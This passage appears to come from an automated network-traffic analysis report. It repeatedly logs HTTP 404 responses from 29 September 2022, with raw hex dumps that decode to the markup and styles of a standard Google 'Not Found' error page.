69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 